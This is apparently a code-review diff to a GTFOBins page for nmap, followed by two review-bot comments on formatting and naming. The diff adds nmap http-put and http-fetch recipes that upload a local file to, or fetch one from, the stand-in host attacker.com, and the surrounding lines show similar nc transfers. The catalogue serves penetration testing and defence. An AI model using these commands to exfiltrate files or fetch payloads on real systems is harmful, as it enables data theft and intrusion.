diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index 0d24a00..49ae529 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -39,6 +39,12 @@ functions: end;c:close();f:close();' > $TF nmap --script=$TF file-upload: + - description: Send a file to a TCP port. Run `socat -v tcp-listen:8080,reuseaddr,fork - on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080. + code: | + RHOST=attacker.com + RPORT=8080 + LFILE=file_to_send + nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. code: | export RHOST=attacker.com @@ -55,6 +61,13 @@ functions: t:close();' > $TF nmap --script=$TF file-download: + - description: Fetch remote file sent to a local TCP port. Run a proper HTTP server on the attacker box to send the file, e.g., `php -S 0.0.0.0:8080`. Note that multiple connections are made to the server and the result is placed in `$TF/IP/PORT/PATH`. Also, it is important that the port is a commonly used HTTP like 80 or 8080. + code: | + RHOST=attacker.com + RPORT=8080 + TF=$(mktemp -d) + LFILE=file_to_save + nmap -p $RPORT $RHOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$LFILE - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. code: | export LPORT=12345
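Review bot: in the first hunk (the new `file-upload` entry using `http-put`), the description has an unclosed backtick after `socat -v tcp-listen:8080,reuseaddr,fork -`, so everything from there to the end of the sentence will render as inline code; close it as `` `socat -v tcp-listen:8080,reuseaddr,fork -` on the attacker box``. The same sentence also drops a word: "a commonly used HTTP like 80 or 8080" should read "a commonly used HTTP port like 80 or 8080", and the reason for that constraint is left implicit; if it is that the NSE script only runs against ports nmap classifies as HTTP, say so in one clause so readers understand why an arbitrary port will silently do nothing. Minor style point: the sibling `nc` entry directly below uses `export RHOST=...`, while this block uses bare assignments; either is fine for a single `nmap` invocation, but the file should pick one form.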
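Review bot: in the second hunk (the new `file-download` entry using `http-fetch`), the variable `LFILE=file_to_save` is passed as `http-fetch.url=$LFILE`, so it is actually the URL path requested from the remote HTTP server, not the name of the saved file; the description itself says the result lands under `$TF/IP/PORT/PATH`. Rename it to something like `URL=/file_to_fetch` (or state in the description that `LFILE` is the remote path) so the example does not suggest the output filename is controllable. The opening phrase "Fetch remote file sent to a local TCP port" is carried over from the `nc` entry and no longer fits, since here nmap connects out to a remote HTTP server; "Fetch a file from a remote HTTP server" matches what the code does. As in the first hunk, "a commonly used HTTP like 80 or 8080" is missing the word "port".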